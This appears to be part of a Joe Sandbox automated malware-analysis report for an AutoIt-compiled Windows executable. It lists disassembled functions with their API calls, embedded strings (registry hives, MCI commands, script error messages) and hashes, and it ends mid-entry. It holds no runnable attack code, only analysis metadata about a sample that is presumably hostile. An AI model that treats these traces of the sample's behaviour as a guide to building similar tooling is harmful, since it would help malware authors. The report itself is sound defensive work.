                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 2698844021-4113822522
                                                • Opcode ID: 2174ab69b3dca975cb014d348d2c117880b8742f70d408fd8b23647275aea732
                                                • Instruction ID: 5670903211d136fde829079b11aab6fd6651d91db47a3d40b84c28c531dd51af
                                                • Opcode Fuzzy Hash: 2174ab69b3dca975cb014d348d2c117880b8742f70d408fd8b23647275aea732
                                                • Instruction Fuzzy Hash: 53514C71104304DFCB04EF20D99596AB7F4FF88758F10896DF89A97261DB39AE09CB52
                                                Function 007CFBDB Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,007AE382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 007CFC10
                                                • LoadStringW.USER32(00000000,?,007AE382,00000001), ref: 007CFC19
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • GetModuleHandleW.KERNEL32(00000000,00835310,?,00000FFF,?,?,007AE382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 007CFC3B
                                                • LoadStringW.USER32(00000000,?,007AE382,00000001), ref: 007CFC3E
                                                • __swprintf.LIBCMT ref: 007CFC8E
                                                • __swprintf.LIBCMT ref: 007CFC9F
                                                • _wprintf.LIBCMT ref: 007CFD48
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007CFD5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 984253442-2268648507
                                                • Opcode ID: 5c15326faa25ca9b3a5eee6e39170482360051200de98b6809beb0bcacd11ae6
                                                • Instruction ID: 0b4949db4d2881997ba9a93cb55d704b260218a21b1151b54117ca4e0daf6f52
                                                • Opcode Fuzzy Hash: 5c15326faa25ca9b3a5eee6e39170482360051200de98b6809beb0bcacd11ae6
                                                • Instruction Fuzzy Hash: 96416072904219EACF15EBD0DD9AEEE7779EF14340F104169F505B2091DE785F49CBA0
                                                Function 007AAA4B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                • String ID:
                                                • API String ID: 884005220-0
                                                • Opcode ID: 6c8408844f0b08e57d9e216025a0fde2bf702848d3db4be5e57d982e8d6b7d59
                                                • Instruction ID: ef0c2d4b9934b8def0d68dbc220aec9cb7b5b2f46046c0056e5d9ce2e3c06536
                                                • Opcode Fuzzy Hash: 6c8408844f0b08e57d9e216025a0fde2bf702848d3db4be5e57d982e8d6b7d59
                                                • Instruction Fuzzy Hash: 9761A072505211FBEB209F24D949B6E77A8FB93331F148719F8019A191EB3DD941CBA2
                                                Function 007FBA67 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 007FBA8A
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 007FBAA1
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 007FBAAC
                                                • CloseHandle.KERNEL32(00000000), ref: 007FBAB9
                                                • GlobalLock.KERNEL32(00000000), ref: 007FBAC2
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 007FBAD1
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007FBADA
                                                • CloseHandle.KERNEL32(00000000), ref: 007FBAE1
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 007FBAF2
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00802CAC,?), ref: 007FBB0B
                                                • GlobalFree.KERNEL32(00000000), ref: 007FBB1B
                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 007FBB3F
                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 007FBB6A
                                                • DeleteObject.GDI32(00000000), ref: 007FBB92
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007FBBA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3840717409-0
                                                • Opcode ID: 989c8d36cd2ad1f14cb8488411a8505e31f212b0caf927f1aeae092c8e0b4d6d
                                                • Instruction ID: 7d09471bf97aff0298ac1a4056bd3fc6d2dd7d90234ab55c53e7ebe06ab8480f
                                                • Opcode Fuzzy Hash: 989c8d36cd2ad1f14cb8488411a8505e31f212b0caf927f1aeae092c8e0b4d6d
                                                • Instruction Fuzzy Hash: ED410675600209EFDB119F65DC88EBEBBB8FF89711F108069F905D7260DB389901DB64
                                                Function 007DD925 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                Download Yara Rule
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 007DDA9C
                                                • _wcscat.LIBCMT ref: 007DDAB4
                                                • _wcscat.LIBCMT ref: 007DDAC6
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DDADB
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DDAEF
                                                • GetFileAttributesW.KERNEL32(?), ref: 007DDB07
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 007DDB21
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DDB33
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                • String ID: *.*
                                                • API String ID: 34673085-438819550
                                                • Opcode ID: fb2c7a66457e2ba7f4692c40ab98a734377bd79d7a3f31bc6287c5c55298bd24
                                                • Instruction ID: f47e1edde00934ffda5d76af415de514453eb8a778a0f664e7eab93f3a63b722
                                                • Opcode Fuzzy Hash: fb2c7a66457e2ba7f4692c40ab98a734377bd79d7a3f31bc6287c5c55298bd24
                                                • Instruction Fuzzy Hash: EC814E725082419FCB34EF64C88596AB7F8AB88354F19C82FF489D7351E639ED44CB52
                                                Function 007FC216 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007FC266
                                                • GetFocus.USER32 ref: 007FC276
                                                • GetDlgCtrlID.USER32(00000000), ref: 007FC281
                                                • _memset.LIBCMT ref: 007FC3AC
                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007FC3D7
                                                • GetMenuItemCount.USER32(?), ref: 007FC3F7
                                                • GetMenuItemID.USER32(?,00000000), ref: 007FC40A
                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007FC43E
                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007FC486
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007FC4BE
                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007FC4F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                • String ID: 0
                                                • API String ID: 1296962147-4108050209
                                                • Opcode ID: 89e02e62f403ba5fbf0a129f715c16ff386f0ce1b20dfaf284f937662baa509b
                                                • Instruction ID: 07a1aa0267a4e24fecaaae8cd38fb739fe20e3541191325796ec49ce6e203b33
                                                • Opcode Fuzzy Hash: 89e02e62f403ba5fbf0a129f715c16ff386f0ce1b20dfaf284f937662baa509b
                                                • Instruction Fuzzy Hash: F9817B71208349AFDB11CF14D994A7ABBE8FF88354F00492DFA9597391CB38D805CBA2
                                                Function 007E742F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(00000000), ref: 007E74A4
                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007E74B0
                                                • CreateCompatibleDC.GDI32(?), ref: 007E74BC
                                                • SelectObject.GDI32(00000000,?), ref: 007E74C9
                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007E751D
                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007E7559
                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007E757D
                                                • SelectObject.GDI32(00000006,?), ref: 007E7585
                                                • DeleteObject.GDI32(?), ref: 007E758E
                                                • DeleteDC.GDI32(00000006), ref: 007E7595
                                                • ReleaseDC.USER32(00000000,?), ref: 007E75A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: 9306f51f06893dba2b556f2e9c0c43160908c7132128ad75454b85a051afa16e
                                                • Instruction ID: fc860b01ec9795098c725f838b28fb77813bfdf0f98b19ecc69410816204d39a
                                                • Opcode Fuzzy Hash: 9306f51f06893dba2b556f2e9c0c43160908c7132128ad75454b85a051afa16e
                                                • Instruction Fuzzy Hash: 74515A71904249EFCB25CFA9CC85EAEBBB9EF48310F14C42DF95997250DB35A940CB64
                                                Function 00776BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00790AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00776C6C,?,00008000), ref: 00790AF3
                                                  • Part of subcall function 007748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007748A1,?,?,007737C0,?), ref: 007748CE
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00776D0D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00776E5A
                                                  • Part of subcall function 007759CD: _wcscpy.LIBCMT ref: 00775A05
                                                  • Part of subcall function 007937BD: _iswctype.LIBCMT ref: 007937C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                • API String ID: 537147316-1018226102
                                                • Opcode ID: e499e15b86de6fe607befdb94ca7edc30435e45f16642e88f028dbad5ee57345
                                                • Instruction ID: d6f9fd66e2a428e0dcc4596a4da39951788ac68c5cb7d3310c15000eae1aadd9
                                                • Opcode Fuzzy Hash: e499e15b86de6fe607befdb94ca7edc30435e45f16642e88f028dbad5ee57345
                                                • Instruction Fuzzy Hash: 51027C31108341DFCB24EF24C885AAFBBE5BF99354F04892DF48997261DB78E949CB52
                                                Function 007745DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007745F9
                                                • GetMenuItemCount.USER32(00835890), ref: 007AD6FD
                                                • GetMenuItemCount.USER32(00835890), ref: 007AD7AD
                                                • GetCursorPos.USER32(?), ref: 007AD7F1
                                                • SetForegroundWindow.USER32(00000000), ref: 007AD7FA
                                                • TrackPopupMenuEx.USER32(00835890,00000000,?,00000000,00000000,00000000), ref: 007AD80D
                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007AD819
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                • String ID:
                                                • API String ID: 2751501086-0
                                                • Opcode ID: 9c5e603547ee40ed5e7a5c307a354bc12213c281e5c6d721bdfa4b1b8cb2ee39
                                                • Instruction ID: a5ad379f3fa9c2a3afbcf0a3edf9aee989803ba0c8d6c0a2b06127eafd90b7d3
                                                • Opcode Fuzzy Hash: 9c5e603547ee40ed5e7a5c307a354bc12213c281e5c6d721bdfa4b1b8cb2ee39
                                                • Instruction Fuzzy Hash: 27711A70640205BFEB309F14DC49FAABF64FF463A4F104216F51AA61E1CBB95C20CB55
                                                Function 007C7B04 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                • _memset.LIBCMT ref: 007C7B93
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007C7BC8
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007C7BE4
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007C7C00
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007C7C2A
                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007C7C52
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C7C5D
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C7C62
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 1411258926-22481851
                                                • Opcode ID: 881d2cbc3f77d6d69f7fc37386e6e811f45491e6df5b0cf59f2e2bff00647879
                                                • Instruction ID: 3335eb306bdf644b5009c48b0b53d26e120e74a3450509bdc66e8f51f5caa4cd
                                                • Opcode Fuzzy Hash: 881d2cbc3f77d6d69f7fc37386e6e811f45491e6df5b0cf59f2e2bff00647879
                                                • Instruction Fuzzy Hash: 31410972C14229ABCF25EBA4DC85DEDB778FF08750F048169E815A7261EF785E05CB90
                                                Function 007F0EA5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFE38,?,?), ref: 007F0EBC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                • API String ID: 3964851224-909552448
                                                • Opcode ID: a16c0e73997117acb5d84ae81a6cd28098328d1c22731739674bf86437a251c1
                                                • Instruction ID: 7d0ed09cb1e3d2e079f467e6bc259492ec947ce33ec7d507e9f886a8e5d7adf9
                                                • Opcode Fuzzy Hash: a16c0e73997117acb5d84ae81a6cd28098328d1c22731739674bf86437a251c1
                                                • Instruction Fuzzy Hash: B041683011064ECFCF20EF50E894AEA3760FF12340F544425FE955B382EB39999ADBA0
                                                Function 007CFAD2 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007AE5F9,00000010,?,Bad directive syntax error,007FF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007CFAF3
                                                • LoadStringW.USER32(00000000,?,007AE5F9,00000010), ref: 007CFAFA
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • _wprintf.LIBCMT ref: 007CFB2D
                                                • __swprintf.LIBCMT ref: 007CFB4F
                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007CFBBE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                • API String ID: 1506413516-4153970271
                                                • Opcode ID: 55032d871663ddc8ee94cda02fa002dcba49f28c33731eece4cd60787f6af1ce
                                                • Instruction ID: 674cc5352fc60e79609fe3ca2720cb589f5d72f1a04b6d9ff11961fa0937e7f8
                                                • Opcode Fuzzy Hash: 55032d871663ddc8ee94cda02fa002dcba49f28c33731eece4cd60787f6af1ce
                                                • Instruction Fuzzy Hash: 3B216F7180021AEBCF16EFA0DC5AEEE7735FF14300F048469F515621A1DA799A58DB50
                                                Function 007D536E Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                  • Part of subcall function 00777A84: _memmove.LIBCMT ref: 00777B0D
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007D53D7
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007D53ED
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007D53FE
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007D5410
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007D5421
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: SendString$_memmove
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 2279737902-1007645807
                                                • Opcode ID: 098b96e472c678a453b1e8d12b53611327c96756f953e41385acd3f2ee564968
                                                • Instruction ID: 2f772db45d8de95a46c11ac025e8edfe64c034dd61f4e134cc49d629121fb8f6
                                                • Opcode Fuzzy Hash: 098b96e472c678a453b1e8d12b53611327c96756f953e41385acd3f2ee564968
                                                • Instruction Fuzzy Hash: E7119020A51179BADB24A661DC4ADFF7BBCFB91B80F00842AB415A21D1DEA81D84C5A1
                                                Function 007D46F8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 208665112-3771769585
                                                • Opcode ID: 9dd2e9411d28357725c1876ec98fe2b101f95df8e6cdb6a6079386b94469d7b4
                                                • Instruction ID: fb84e734a0f67623c9458931600bf682c0a6e3b852eb89d31ee7e0ecf50925b2
